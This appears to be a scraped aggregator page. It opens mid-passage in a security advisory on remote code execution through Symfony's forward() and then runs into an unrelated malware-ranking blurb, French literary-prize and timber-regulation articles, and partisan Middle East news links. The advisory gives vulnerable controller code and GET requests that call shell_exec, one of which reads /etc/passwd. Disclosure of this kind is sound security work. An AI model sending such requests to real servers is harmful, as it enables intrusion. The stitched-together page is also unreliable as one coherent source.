path: /forward/{controller}/{cmd} defaults: { _controller: ‘AppControllerBaseController::myForward1’ }

Both the controller and cmd route parameters will be passed into the BaseController::myForward1 controller:

public function myForward1($controller, $cmd, array $path = array(), array $query = array()) { // Add the cmd var to the path array if ($cmd) { $path = compact(‘cmd’); } return $this->forward($controller, $path, $query); }

In this example route and controller, the cmd parameter is added to the path array (with the name cmd) that is passed into the AbstractController::forward() function. At this point, the controller is vulnerable to RCE with the below GET request: http://127.0.0.1/forward/shell_exec/id

By adding the cmd argument to the path array in the controller, and calling it cmd, Symfony will correctly resolve both the controller and arguments required for the shell_exec() PHP builtin function (http://php.net/manual/en/function.shell-exec.php). Once the controller and arguments are successfully resolved the controller is executed. Specifically in the above example URL, calling the Linux OS ‘id’ command. An alternative but still vulnerable route and controller combination is shown below, where URL query parameters from the request are merged into the path array and used in the AbstractController::forward() function.

forward:

path: /forward/{controller} defaults: { _controller: ‘AppControllerBaseController::myForward2’ } public function myForward2($controller, array $path = array(), array $query = array()) { // Get current request $req = App::getRequest(); // Populate path vars from query params $path = array_merge($path, $req->query->all()); return $this->forward($controller, $path, $query); }

With a configuration such as this, the same command could be run with the GET request:

http://127.0.0.1/forward2/shell_exec?cmd=id

PoC

With the following PHP page called ‘index.php’ located in the public symfony directory:

<?php use App Core App; use Symfony Component Debug Debug; use Symfony Component Dotenv Dotenv; use Symfony Component HttpFoundation Request; require __DIR__.‘/../vendor/autoload.php’; // The check is to ensure we don’t use .env in production if (!isset($_SERVER[‘APP_ENV’])) { if (!class_exists(Dotenv::class)) { throw new RuntimeException(‘APP_ENV environment variable is not defined. You need to define environment variables for configuration or add “symfony/dotenv” as a Composer dependency to load variables from a .env file.’); } (new Dotenv())->load(__DIR__.‘/../.env’); } if ($trustedProxies = $_SERVER[‘TRUSTED_PROXIES’] ?? false) { Request::setTrustedProxies(explode(‘,’, $trustedProxies), Request::HEADER_X_FORWARDED_ALL ^ Request::HEADER_X_FORWARDED_HOST); } if ($trustedHosts = $_SERVER[‘TRUSTED_HOSTS’] ?? false) { Request::setTrustedHosts(explode(‘,’, $trustedHosts)); } $env = $_SERVER[‘APP_ENV’] ?? ‘dev’; $debug = (bool) ($_SERVER[‘APP_DEBUG’] ?? (‘prod’ !== $env)); if ($debug) { umask(0000); Debug::enable(); } $app = new App($env, $debug); $request = App::getRequest(); $response = $app->handle($request); $response->send(); $app->terminate($request, $response);

We can issue a GET Request for the next URL:

http://localhost:8000/forward2/shell_exec?cmd=cat%20/etc/passwd

Result:


SSD Advisory   Symfony Framework forward() Remote Code Execution

          Worst malware and threat actors of 2018 so far      Cache   Translate Page      

What’s the worst malware so far into 2018? The worst botnets and banking trojans, according to Webroot, were Emotet, Trickbot, and Zeus Panda. Crysis/Dharma, GandCrab, and SamSam were the worst among ransomware. The top three in cryptomining/cryptojacking were GhostMiner, Wanna Mine, and Coinhive.

And included in the list of top 10 threat actors so far this year, we find Lazarus Group, Sofacy and MuddyWater coming in the top three spots, according to AlienVault. Lazarus Group took the top spot from Sofacy this year. The reported locations for the top 10 threat actors are North Korea, with two groups; Russia, with three groups; Iran, with two groups; China, with two groups; and India, with one. Microsoft Office was the most exploited application, but Adobe Flash, WebLogic, Microsoft Windows, Drupal and GPON routers were also listed in the top 10.

To read this article in full, please click here


          Capitalism and Sexual Assault      Cache   Translate Page      
Point (via the International Socialist Review) This article examines the phenomenon of sexual assault from a Marxist perspective—that is, analyzed in the context of capitalist social relations. Like imperialism and war, oppression is a necessary byproduct of the rule of capital. Exploitation is the method by which the ruling class robs workers of surplus value; […]
          Pierre Guyotat devient Prix Medicis 2018, Le Mars Club, Médicis étranger      Cache   Translate Page      

Ce 6 novembre, les jurés du prix Medicis, qui auront cette année pleinement ”prix” part au jeu de la rentrée littéraire, remettaient leurs trois récompenses. Roman français, étranger et essai. Depuis la première sélection du 13 septembre, c'est une approche assez équilibrée que l'on a pu découvrir. Et les grands gagnants de 2018 sont...

 



 


Roman français prix Médicis 2018

Pierre Guyotat, Idiotie (Grasset)

 

" Cet Idiotie, qui peut faire suite aux textes dits "autobiographiques" que j'ai publiés de 2007 à 2010 (Gallimard), traite de mon entrée, jadis, dans l'âge adulte, entre ma dix-neuvième et vingt-deuxième année, entre 1959 et 1962. J'y ai choisi ces épisodes en raison de leur retentissement en moi alors et des forces qui s'y manifestent : ma recherche du corps féminin, mon rapport conflictuel à ce qu'on nomme le "réel" , ma tension de tous les instants vers l'Art et vers plus grand que l'humain, ma pulsion de rébellion permanente : contre le père pourtant tellement aimé, contre l'autorité militaire, en tant que conscrit puis soldat dans la guerre d'Algérie, arrêté, inculpé, interrogé, incarcéré puis muté en section disciplinaire. 

Armée rejetée autant qu'attirante -l'ordre, la logique, comme la forme en Art. Mes rébellions d'alors et leurs conséquences : fugue, faim, vol, remords, errances, coups et prisons militaires, manifestations corporelles de cette sorte de refus du réel imposé : on en trouvera ici des scènes marquantes. Drames, intimes, politiques, amitiés, camaraderies, cocasseries, tout y est vécu dans l'élan physique de la jeunesse."
 

Roman étranger prix Médicis 2018 



Rachel Kushner, Le Mars Club, traduit de l'anglais par Sylvie Schneiter (Stock)
 

Romy Hall, 29 ans, vient d'être transférée à la prison pour femmes de Stanville, en Californie. Cette ancienne stripteaseuse doit y purger deux peines consécutives de réclusion à perpétuité, plus six ans, pour avoir tué l'homme qui la harcelait. Dans son malheur, elle se raccroche à une certitude : son fils de 7 ans, Jackson, est en sécurité avec sa mère. Jusqu'au jour où l'administration pénitentiaire lui remet un courrier qui fait tout basculer. 

Oscillant entre le quotidien de ces détenues, redoutables et attachantes, et la jeunesse de Romy dans le San Francisco de années 1980, Le Mars Club dresse le portrait féroce d'une société en marge de l'Amérique contemporaine.

Un roman que ActuaLitté avait particulièrement apprécié : « Entre injustice et exploitation, c’est le processus carcéral qui est passé au crible, impitoyable lui-même pour celles et ceux qu’il finira par broyer. C’est également le portrait des femmes seules et pauvres, en Amérique, que l’on retrouve : une situation bien peu enviable. »
 

Prix Médicis de l'essai 2018 
 

Stefano Massini, Les Frères Lehman (trad. Nathalie Bauer, ed. Globe)



11 septembre 1844, apparition. Heyum Lehmann arrive de Rimpar, Bavière, à New York. Il a perdu 8 kilos en 45 jours de traversée. Il fait venir ses deux frères pour travailler avec lui. 15 septembre 2008, disparition. La banque Lehman Brothers fait faillite. Elle a vendu au monde coton, charbon, café, acier, pétrole, armes, tabac, télévisions, ordinateurs et illusions, pendant plus de 150 ans. Comment passe-t-on du sens du commerce à l'insensé de la finance ?

Comment des pères inventent-ils un métier qu'aucun enfant ne peut comprendre ni rêver d'exercer ? Grandeur et décadence, les Heureux et les Damnés, comment raconter ce qui est arrivé ? Non seulement par les chiffres, mais par l'esprit et la lettre ? Par le récit détaillé de l'épopée familiale, économique et biblique. 

Par la répétition poétique, par la litanie prophétique, par l'humour toujours. Par une histoire de l'Amérique, au galop comme un cheval fou dans les crises et les guerres fratricides. Comment prendre la suite de Yehouda Ben Tema qui écrivit dans les Maximes des Pères : « Tu auras cinquante années pour devenir sage. Tu en auras soixante pour devenir savant » ? Nous avons 1207 pages et 30 000 vers pour devenir instruits, circonspects, édifiés. 


Pierre Guyotat – Idiotie – Grasset – 9782246862871 – 19 €

Rachel Kushner, trad. Sylvie Schneiter – Le Mars Club – Stock – 9782234085015 – 23 €
Stefano Massini, trad. Nathalie Bauer – Les Frères Lehman – Globe – 9782211235136 – 24 €


 

Rentrée littéraire 2018 : les fashion weeks du libraire


Retrouver la liste des prix littéraires français et francophones. 

 


          L'édition, bientôt responsable de la légalité du bois utilisé pour les livres ?      Cache   Translate Page      

Appliqué depuis 2013, le Réglement Bois de l'Union européenne (RBUE) impose plusieurs règles pour lutter contre le commerce du bois illégal. Ainsi, les entreprises qui importent ou récoltent du bois ou des produits dérivés du bois à des fins commerciales doivent mettre en place un Système de Diligence Raisonnée pour s'assurer que le bois utilisé et ses dérivés ne proviennent pas de sources illégales. L'Union européenne veut étendre ce RBUE aux fabricants de livres, mais l'industrie de l'édition n'est pas très enthousiaste...


IMG_2945
(photo d'illustration, orange grove media, CC BY 2.0)
 
 

L'Union européenne, pour améliorer l'efficacité de son dispositif, entend l'étendre à d'autres industries qui utilisent le bois ou ses dérivés comme matière première : les producteurs de charbon de bois, de chaises ou encore d'instruments de musique sont pour l'instant exclus du périmètre du RBUE, tout comme les éditeurs. Après une évaluation, la Commission européenne a ouvert une consultation publique pour déterminer si le périmètre devait être étendu.

 

Copeaux comme cochons...
 

Par ailleurs, la Commission est « en train de réaliser une analyse d’impact afin d’examiner les modifications qui pourraient être apportées au champ d'application du règlement sur le bois », qui inclut une consultation publique de toutes les parties prenantes.

 

Parmi ces parties prenantes, on retrouve donc les éditeurs, qui ont donné leur avis dans cette consultation organisée entre le 29 janvier et le 24 avril derniers. Le Syndicat national de l'édition, qui représente 670 éditeurs français, et en particulier les plus importants en termes de chiffre d'affaires, assure bien sûr que le périmètre actuel est suffisant pour atteindre les objectifs recherchés par le Règlement Bois et s'oppose à toute extension de celui-ci aux livres.

 

Individuellement, les éditeurs ne se sont pas passionnés pour la question : seule la maison Dargaud a donné un avis, par ailleurs similaire à celui du SNE. La Fédération européenne des éditeurs (FEE) estime aussi, dans sa réponse, que le périmètre actuel est suffisant, mais, curieusement, ne sait pas si celui-ci doit être étendu à d'autres industries et producteurs.

 

Le Börsenverein des Deutschen Buchhandels, équivalent allemand du SNE, délivre un avis similaire à celui de la FEE, et c'est à peu près tout pour les avis de l'édition européenne.

 

Les imprimeurs européens lésés ?

 

Face à l'édition, deux types de répondants tiennent un discours radicalement différent. D'un côté, on trouve un certain nombre d'ONG et associations de défense de l'environnement, dont WWF, ClientEarth ou encore Greenpeace. Évidemment, ces organisations incitent la Commission à étendre le périmètre du Règlement Bois, pour que plus de producteurs soient concernés par la nécessaire attention à la légalité des sources. Les enquêtes récurrentes de ces ONG – celle du WWF sur la littérature jeunesse, dernièrement – motivent leurs avis.

 

On trouve aussi des sociétés du secteur des papiers graphiques, comme l'Union des Industries des Papiers, Cartons et Celluloses (COPACEL), qui recommande une extension aux produits de l'édition, ou Intergraf, la Fédération européenne de la communication imprimée et numérique, qui indique être du même avis.

Cette dernière explique : « L'industrie européenne de l'impression souffre de la non-inclusion des produits imprimés [au RBUE]. Bien que les produits imprimés ne sont pas couverts, les papiers achetés par les imprimeurs européens le sont. [...] À l'inverse, les produits imprimés importés sur le marché n'entrent pas dans le périmètre du RBUE et peuvent en conséquence provenir d'exploitations forestières illégales. »

 

Selon Intergraf, c'est donc le marché de l'impression tout entier qui se retrouve touché, au détriment des imprimeurs européens : un imprimeur hors UE pourra fournir un papier à moindre coût, mais issu de sources illégales, à des clients. L'intégralité des réponses est à cette adresse.

 

Une obligation « lourde » et « surdimensionnée »

 

Contacté par ActuaLitté, le Syndicat national de l'édition réaffirme sa volonté de conserver le livre hors du périmètre du règlement bois. « En effet, en cas d’inclusion des livres dans le champ d’application, les éditeurs mettant sur le marché européen des livres importés ou imprimés hors de l’Union Européenne, seraient dans l’obligation de mettre en place un système de diligence raisonnée. Cela concernerait principalement la production de livres illustrés et notamment d’albums de jeunesse imprimés en Asie ou hors UE », note le SNE.

 

Le syndicat note par ailleurs qu'une étude récente de WWF n'avait relevé « aucune trace de bois d’origine illégale dans les livres analysés » : la même étude signalait cependant les risques associés à l'impression en Asie, qui représente 3,9 % en moyenne du nombre de titres entre 2006 et 2016 et 14,1 % des titres Jeunesse sur la même période. Ces pays d'impression sont également très prisés pour les livres de jeux et divertissement, ainsi que les ouvrages pratiques, comme la cuisine. Par ailleurs, l'ONG avait souligné des problématiques de transparence et de certifications liées aux imprimeurs asiatiques.

 

L'édition répond au WWF : le livre jeunesse
n'abîmerait pas les forêts

 

Pour le SNE, le système de diligence raisonnée imposée aux producteurs par l'Union européenne « est extrêmement lourd, complexe et surdimensionné par rapport au cœur de métier de l’éditeur ». Selon le syndicat, qui rappelle que la plupart des maisons d'édition sont des PME, la mise en place de la diligence raisonnée « causera du tort aux petites et moyennes maisons d’édition – notamment de jeunesse ». Le SNE assure que le nombre d'intermédiaires entre récolte du bois et fabrication de la pâte à papier est tel que le suivi des modifications est impossible.

 

Enfin, les éditeurs assurent que l'utilisation de papiers certifiés et que le développement de solutions collectives sont plus efficaces pour améliorer le niveau de traçabilité des papiers utilisés.

 

Le choix de la Commission européenne quant au périmètre de l'extension du règlement bois devrait être connu à la fin de l'année 2018.


          11/06 Links Pt1: Official Palestinian Authority paper: "Settlers" kill Palestinians for pleasure; Shin Bet Chief: We foiled 480 major terror attacks this year;       Cache   Translate Page      
From Ian:

PMW: "Settlers" kill Palestinians for pleasure - hate speech in official PA daily
The Palestinian Authority regularly demonizes Jews, Israelis, and those who they call "settlers" and accuse them of believing in precisely the hate ideologies the PA itself espouses to its own people.

While accusing Israelis of participating in a religious war, it is Mahmoud Abbas' advisor who has called Israel "Satan's project" and presented the war with Israel as a religious war to destroy Israel and Jews. The PA Mufti, who is appointed by Abbas, has said extermination of Jews is a religious obligation and Islamic destiny.

In Israel, the isolated cases of Israeli terror against Palestinians are punished and condemned. It is the Palestinian Authority under direct instructions of Mahmoud Abbas that rewards murderers of Israelis with high salaries and calls terrorist murderers "stars in the sky of the Palestinian people."

In this op-ed in the official PA daily, the writer projects the PA's own hate ideologies onto what he refers to as Israeli "settlers." They are demonized as inhuman murderers who kill Palestinians for their own pleasure and at the orders of the Israeli government.

Under the headline "The settlers are sacrificing the Palestinians' blood as a sacrifice to Netanyahu," regular columnist for the official PA daily, Muwaffaq Matar, who is also a member of the Fatah Revolutionary Council and hosts a TV program on Fatah-run Awdah TV, portrayed Israelis living beyond the Green Line as "mass murderers obsessed with bloodshed" who are "directed" and controlled by the Israeli army and government:

"Criminals, mass murderers, obsessed with bloodshed, wild unbridled foreigners, but also directed - these are the settlers, the colonialists, the pawns of the racist regime in Tel Aviv.
[They are] criminals who are being activated by a remote control with dual controls - one in the hands of the heads of the occupation army, and the second in the hands of the heads of the coalition of [Israeli Prime Minister Benjamin] Netanyahu's government. Both of them are trying to inflict a heavy toll on the Palestinian citizens by means of groups of people devoid of the elements of human nature, who have no connection to the civilized societies other than [their] human form..."
[Official PA daily Al-Hayat Al-Jadida, Oct. 14, 2018]
Petra Marquardt-Bigman: Don’t Be Fooled: The Left Only Cares About Palestinians If It Can Blame Israel
Anyone with even a passing interest in news from the Middle East will know that all over the region, undemocratic and repressive regimes use their security forces to suppress dissent. The Palestinian authorities in Gaza and the West Bank are no exception, as a recently released Human Rights Watch report documents.

Considering that the report is “the result of a two-year investigation,” it is remarkably meager. According to the summary, HRW exposes the “machineries of repression to crush dissent” by showing that Palestinian authorities in the West Bank and Gaza “routinely arrest people whose peaceful speech displeases them and torture those in their custody.”
Why Israel Is Right To Expel Human Rights Watch’s Omar Shakir

While this might give the impression that the report focuses exclusively on the abuse of people arrested for “peaceful speech,” there are also chapters that deal with cases of people accused of criminal charges in Gaza and the West Bank.

But what the report leaves out is perhaps more noteworthy than what it covers. A glimpse of what’s missing is provided on page 51, where one sentence suffices to deal with the most egregious abuses:

“Hamas authorities have also carried out 25 executions since they took control in Gaza in June 2017 [sic! Hamas took control in June 2007], including 6 in 2017, following trials that lacked appropriate due process protections and courts in Gaza have sentenced 117 people to death, according to the Palestinian Center for Human Rights.”

In other words, a report that is touted as “the result of a two-year investigation” relies on another human rights organization to provide a one-sentence summary of executions carried out by Hamas. Presumably, two years were too short for the hard-working people at HRW to check their own records, which indicate that Hamas carried out considerably more than “25 executions” since taking power in 2007.

But the appalling sloppiness displayed by HRW when it comes to keeping track of the murderous record of the Islamist terror group that rules Gaza is a telling sign of how little Palestinian human rights matter to HRW when Israel can’t be blamed.

Dore Gold: The Bedouin Encampment of Khan al-Ahmar Violates the Oslo Accords
Khan al-Ahmar is a cluster of Bedouin structures located in the Judean Desert to the east of Jerusalem. This past year this subject has been heating up. It is located on public land and is situated on the main route connecting Jerusalem to the Jordan Valley. Twenty-eight Bedouin families live there. It is too small to really be called a village, so some label it as a hamlet or even other terms. The structures in Khan al-Ahmar were not erected with any sort of building permit, as required by Israel's Civil Administration in the West Bank.

Accordingly, demolition orders were issued in 2009. Though the residents turned to the Israeli Supreme Court, in its ruling the Court stated: "there is no dispute that the entire complex was put up in violation of the zoning laws." In the past the Israeli Supreme Court ruled that Jewish families living in illegally constructed dwellings needed to be removed, as was the case in Migron (2012), Amona (2017), and Netiv Ha-Avot (2018).

Some Western commentators have fundamentally misunderstood Israel's decision to dismantle Khan al-Ahmar. A New York Times analysis insisted that Israel sought "to make room for the expansion of Jewish settlements." Of course, anyone familiar with the topography of the West Bank, with the map of the West Bank, knows that the Judean Desert is full of empty territory, so that the argument that the demolition of Khan al-Ahmar was required for settlement expansion really rings hollow.




Security agency chief warns of deceptive calm: We foiled 480 major terror attacks this year
The Shin Bet security agency has thwarted 480 ‎Palestinian terrorist attacks so far in 2018, agency ‎Director Nadav Argaman told the Knesset's Foreign ‎Affairs and Defense Committee on Tuesday.‎

The Shin Bet's efforts were a major factor in the ‎defense establishment's ability to maintain the ‎fragile calm between Israel and the Palestinians, ‎especially in Judea and Samaria, Argaman said.‎

‎"The situation in the Palestinian arena has been ‎‎very unstable this year. In the Gaza Strip, we are ‎somewhere between a potential [military] campaign ‎and efforts to ‎stabilize the humanitarian situation," he told the committee.

‎"In Judea and Samaria the situation is very ‎complex ‎as well. Things on the ground are ‎relatively calm, but this calm is deceptive. The ‎situation is actually highly combustible."‎

Argaman continued, "Hamas is constantly trying to launch terrorist attacks in and from Judea and ‎Samaria.

"We were able to prevent 480 major ‎terrorist attacks, stop 590 lone-wolf terrorists and ‎arrest 219 Hamas cells. This indicates that there is ‎a large, clandestine terrorist infrastructure ‎there."

Hamas leaders in Gaza and Turkey are sparing no ‎effort to mastermind terrorist attacks in Judea and ‎Samaria, and similar efforts are being made from ‎‎Lebanon by the Hezbollah terrorist group, Argaman said.
Israel’s Next Northern War: Operational and Legal Challenges
Hezbollah has threatened Israel’s northern border for decades. Today, however, the nature of this threat has become dire, and the risks of escalation real, as Iran continues supplying Syria and Hezbollah in Lebanon with game-changing weapons to devastate the Israeli homeland.

When the next conflict erupts between Israel and Hezbollah, its scale and intensity will bear little resemblance to those of recent memory. Hezbollah today is highly competent, adaptable and lethal. Its forces have gained invaluable battlefield experience in Syria and amassed more weaponry than 95 percent of the world’s conventional militaries, including at least 120,000 rockets and missiles. This is more than all of Europe’s NATO members combined, and ten times as many as when it last went to war with Israel in 2006.

Especially troubling is Hezbollah’s growing arsenal of powerful long-range precision missiles capable of striking targets throughout Israel. Unlike in recent conflicts, Israel’s missile defenses will be incapable of shielding the nation from such a threat. From the outset of conflict, Hezbollah will be able to sustain a launch rate of more than 3,000 missiles per day – as many as Israel faced in the entire 34-day conflict in 2006.

Despite this quantum leap in its capabilities, Hezbollah is under no illusion about its ability to inflict military defeat on Israel. It will not seek victory in the valleys of Lebanon or the skies over Israel, but in the court of public opinion.

To do so, it will use combat operations to lay the groundwork for an information campaign delegitimizing Israel. Two tactics will be central to Hezbollah’s efforts: first, deliberately attacking Israeli civilian population centers to compel an aggressive response by the Israel Defense Forces (IDF); second, illegally exploiting the presence of Lebanese civilians to shield itself from IDF attack.

Hezbollah will then manipulate the inevitable casualties by relying on widespread misperceptions about the true nature of combat operations and how international law (the law of armed conflict, or LOAC) regulates such operations. It will use the inevitable images of civilian suffering in Lebanon to portray Israel’s lawful operations as immoral and illegal. By weaponizing information and the law, Hezbollah will seek to force Israel to halt its self-defense campaign before the IDF can achieve decisive victory.
Netanyahu says ‘occupation is baloney’ if a country is powerful enough – reports
Prime Minister Benjamin Netanyahu reportedly told lawmakers in his governing Likud party on Monday that powerful countries can occupy territories and transfer populations without consequence, in an apparent reference to ostensible Arab indifference toward Israel’s control over the West Bank.

“Power is the most important [component] of foreign policy. ‘Occupation’ is baloney. There were huge countries that have occupied and transferred populations and no one talks about them,” Netanyahu was quoted by Army Radio as saying Monday, in the closed-door Likud faction meeting. The remarks were also carried by the Yedioth Ahronoth daily on Tuesday morning.

“Power changes everything and it changes our policies vis-a-vis Arab states, and there are other countries on the way,” he reportedly added, apparently referring to states that have covertly expressed interest in forging diplomatic ties with the Jewish state.

The prime minister also appeared to reject the notion that Israeli territorial concessions could bring peace, according to additional comments from the meeting published by Yedioth on Tuesday.

“Contrary to the notion that concessions will bring about agreements with the Arabs, concessions will only bring about slight and short-term changes and nothing more,” Netanyahu said, seemingly referring to ceding territory to the Palestinians. “What we need to do is advance [talks] on shared interests with Israel based on technological power.”

Netanyahu’s reported comments came after he visited Oman last month in the first official meeting between the leaders of the countries since 1996.
Netanyahu: 'Occupation is bull'
Speaking at a Likud party meeting, Prime Minister Benjamin Netanyahu said Monday that the demonstration of strength is the most important thing in Israel's foreign policy.

"'Occupation' is bull. There are countries that have conquered and replaced entire populations and the world keeps silent. Strength is the key, it makes all the difference in our policy towards the Arab world."

Netanyahu stressed that concessions are perceived as weakness in the Middle East . "As opposed to the perception that concessions promote agreements with the Arabs, they would only bring minor and short-term changes—nothing more.

"The right thing to do is to make progress through common interests, which are based on technological strength," the premier explained. (h/t Elder of Lobby)
Dutch parliament to hold hearing on PA program rewarding terrorism
Prompted by Israel calls to condemn the Palestinian Authority for rewarding terrorism, the Dutch Parliament will host an event later this week to hear from prominent activists who are spreading awareness about the so-called “pay-to-slay” initiative.

Director of the Israel-based nongovernmental organization Palestinian Media Watch Itamar Marcus and terror-attack survivor Kay Wilson will travel to the Hague to address Dutch politicians about the P.A. giving convicted terrorists and their families huge salaries. Marcus and Wilson were invited by Dutch parliament member Joël Voordewind, who invited Marcus and Wilson, and will be chairing the discussion.

The move was endorsed by Yesh Atid Party minister Elazar Stern.

Stern has called on “the Parliament of the Netherlands to send a clear message that the P.A. must stop financially rewarding the terrorists.”

The Netherlands gives more than $14.8 million annually to UNRWA, the United Nations agency that deals with the Palestinian refugee issue. The United States cut its funding to UNRWA in September.

“It is important to update the Dutch Parliament that the P.A. has ignored all resolutions demanding they stop rewarding terror,” said Marcus. “While in some years the P.A. attempted to deceive the international community and conceal the payments, in its 2018 budget, the P.A. openly allocated 1.2 billion shekels [288,000,000 euros] for payments to terrorist prisoners and families of ‘martyrs.’ ”
Minister: Israel might destroy Syrian S-300s, even if manned by Russians
An Israeli cabinet minister has warned that if the Syrians use their recently supplied advanced Russian air defense missiles to bring down Israeli planes over Israeli territory, the launchers would be targeted — even if that means endangering Russian military specialists at the launch sites.

Environmental Protection Minister Ze’ev Elkin, who is also co-chair of the Russia-Israel Intergovernmental Commission, told Russian media Monday that it was a “big mistake” for Moscow to supply its ally Syria with the S-300 missile system, because the advanced missiles, which are considered a significant threat to Israeli air power in the area, “might lead to destabilization of the situation.”

Elkin cautioned that “considering the mess” that the Syrian army was in, the Syrians cannot be trusted to operate the equipment correctly and may end up shooting down an “Israeli military or commercial plane over Israeli territory.”

Israel, he noted, reacts to attacks on its territory and aircraft with “practical actions,” which would “undoubtedly take place” against the launchers should Israeli aircraft be hit in Israeli airspace.

“I greatly hope that there would be no Russian military specialists [at the missile launch sites],” he said, stressing that in the past Israel has taken pains to ensure that Russian military personnel are not hurt through its actions in Syria.
Palestinian attempts stabbing attack near Kfar Adumim
A Palestinian woman tried to stab a border police officer by a gas station near the Kfar Adumim settlement on Tuesday, off Route 1, in the West Bank.

Police received a report about a suspicious looking Palestinian woman, who was in a falafel stand in the gas station’s compound and refused to leave.

When border police arrived, the woman, 37, from the Palestinian city of Yatta in the South Hebron Hills, left the area and began walking towards the Allon settlement.

Border police called on her to stop and began to approach her, the police spokesperson said.

Instead of stopping, the woman pulled out a pair of scissor from her bag and ran at them, yelling in Arabic.

One officer shot and moderately wounded her. Border police who later searched her bag found a knife inside it.

The woman was transported to the Hadassah Medical Center at Mt. Scopus.
IDF to partially demolish home of Barkan attacker
The IDF has ordered the partial demolition of the home of the terrorist responsible for the deadly shooting attack in the Barkan industrial zone last month.

On Tuesday, the Head of the IDF’s Central Command, Maj.-Gen. Nadav Padan issued the demolition orders for two stories of the home where Naalwa lived in the West Bank village of Shweika near Tulkarem.

According to the IDF Spokesperson’s Unit, the order was signed after a request was made by the attacker’s family against the demolition order was rejected.

Nevertheless the home will remain partially intact, with the demolition to be limited to basement and ground floor of the building.

In early October 23 year-old Ashraf Walid Suleiman Na’alwa shot dead Kim Levengrond-Yehezkel, 29, of Rosh Ha’ayin, and Ziv Hagbi, 35, from Rishon Lezion. He also is suspected of shooting a third woman, seriously injuring her.
Israel steps up effort to block PA activities in Jerusalem
Israeli security forces on Sunday searched the offices of the PA’s Jerusalem Affairs Ministry in Dahiyat al-Barid, a West Bank village located north of Jerusalem.

Palestinians said that IDF soldiers and security officers confiscated many documents and computers. Several employees were summoned for questioning at Jerusalem police headquarters.

The raid on the offices of the PA ministry, which also includes the headquarters of the PA “Governorate of Jerusalem,” came in the context of Israel’s efforts to enforce a law that bans the PA from operating inside the country.

Israel says that the Palestinians had been acting in violation of the Law for the Implementation of the Agreement on the Gaza Strip and Jericho Area – Restriction on Activity – 1994, which prevents the PA from carrying out political, governmental or similar activity within the area of the State of Israel, including in east Jerusalem.

In recent months, however, the PA has increased its activities in east Jerusalem, prompting Israeli authorities, to take a number of measures to combat the phenomenon. The measures include, among other things, the arrest of scores of PA-affiliated activists and officials in east Jerusalem and the ban of dozens of events organized by the PA and other Palestinian political groups.
The unsung hero of the fight against Gaza arson terrorism
Yassin Abu Sidra, 24, stands at the top of an 18-meters-high tower on the border of the Gaza Strip, near Kibbutz Be'eri, and scans the area from morning till nightfall looking for fires.

Since the Palestinians began flying incendiary balloons and kites into Israel some seven months ago, this has been his mission.

Abu Sidra, a lookout for Keren Kayemeth LeIsrael (KKL), is the first to spot the incendiary balloons and kites and helps preventing the fire from spreading by sending firefighting forces to the scene.

This job requires him to constantly be on alert. In recent months, he hasn't had a moment's rest. From the top of the observation tower he can see the Be'eri Forest, the Kissufim Forest, the Shokeda Forest and the farmland of the Israeli communities by the border.

He has already spotted hundreds of incendiary balloons and kites and directed firefighting forces to where they landed.

"There were days of 30-40 fires a day," Abu Sidra says. "The firefighting forces ran from one scene to the next, rushing to get there to prevent the spread of the fire."
Hamas demands tax on Palestinian goods passing through Kerem Shalom: report
Hamas on Tuesday morning was reportedly demanding Palestinian merchants and business owners pay an extra 30 NIS for all goods passing through Kerem Shalom crossing from Israel.

The added tax is causing delays in the movement of goods and fuel, Walla reported.

Palestinians in the blockaded enclave are protesting the tax implemented by Hamas, the Islamist government of the Gaza Strip, the report added.
IsraellyCool: “Iconic” Shirtless Palestinian Rioter Reportedly Injured. The Photos Tell a Different Story
According to some reports, “Triple A” A’ed Abu Amro – otherwise known as shirtless terrorist who George Takei crushed on – has been shot.

Multiple reports from Gaza say that the 20-year-old protester photographed last month with a slingshot and a Palestinian flag was among those injured by Israeli troops in the most recent protests.

A’ed Abu Amro was among those injured by Israeli sniper fire on Monday, according to multiple activists and journalists reporting from the area. Photos show him being carried away on a stretcher.

Abu Amro appears to have been shot in the leg and is recovering at a Gaza hospital.


Except the photos of him on the stretcher seem to tell a different story – perhaps phasers were set to stun


In other words, just like everything else about this “protester” and the cause he represents, it seems to be a lie.
Egypt Considers Banning The Burqa As Part Of Anti-Extremism Campaign
Egypt is discussing a new draft law that would prevent women from wearing a burqa (nikab) in public spaces as part of a government campaign against extremist interpretations of Islam. The burqa, used mainly in Islamic cultures, is the veil that covers a woman’s entire face except for the eyes.

On Saturday, Ghada Ajami, a lawmaker, submitted a bill in the Egyptian parliament calling for a fine of 1,000 Egyptian pounds ($56) for women who defy the proposed ban. The fine would double for repeat offenders.

Ajami stressed to the press that the purpose of the bill is “to support the state’s efforts in fighting terrorism.”

A copy of the draft bill obtained by The Media Line states that the burqa would be prohibited in Egyptian public spaces “at any time and under any circumstances.”

Public spaces would include hospitals, health clinics, schools, cinemas, theaters, public libraries, museums, and government buildings, among others.

Ahmad Sharbini, an Egyptian political analyst, told The Media Line that “Egypt is going through a period of instability because of radical Islamic groups operating within the country,” adding that the burqa creates a security problem as “many male and female terrorists use it to hide their identities or sneak into places.
Egypt nixes Brazilian FM's visit as embassy relocation plans sour ties
Egypt has postponed a visit by Brazil's top diplomat, the Brazilian Foreign Ministry said on Monday. Diplomatic sources said decision followed President-elect Jair Bolsonaro's vow to relocate the Brazilian Embassy in Israel to Jerusalem.

Foreign Minister Aloysio Nunes Ferreira had been set to fly to Cairo for a three-day visit from Nov. 8 to 11 that was to have included meetings with President Abdel Fattah el-Sissi and Foreign Minister Sameh Shoukry.

But Cairo postponed the trip, citing problems with senior officials' agendas, the Brazilian Foreign Ministry said onday. Ministry insiders said no new date has been proposed, signaling Egypt's discontent with Bolsonaro's proposal.

Behind the scenes, Egyptian officials said Cairo was deeply displeased with Bolsonaro's promise, which breaks with longstanding Brazilian foreign policy in support of a two-state solution to the Middle East conflict.

The Egyptian Embassy in Brasilia was unavailable for comment.


Saudi Arabia prepares to build first nuclear research reactor
Saudi Crown Prince Mohammed bin Salman on Monday laid the foundation stone for the kingdom’s first nuclear research reactor, state media said, as the kingdom seeks to diversify its energy mix.

The reactor was among seven projects launched by the prince during a visit to Riyadh’s King Abdulaziz City for Science and Technology, the official Saudi Press Agency reported.

SPA offered no details on when the research or non-power reactor — typically used for research, development and education purposes — would be built and at what cost.

Saudi Arabia currently draws on oil and natural gas to meet its own fast-growing power demand and desalinate its water.

The world’s top crude exporter harbors plans to build 16 nuclear reactors over the next two decades for $80 billion as it seeks to diversify, despite concerns over nuclear proliferation in the Middle East.

Prince Mohammed said in March that if Iran develops a nuclear weapon, Riyadh will do so too.
Iran says US will ‘regret’ renewed sanctions, vows Tehran won’t cave to pressure
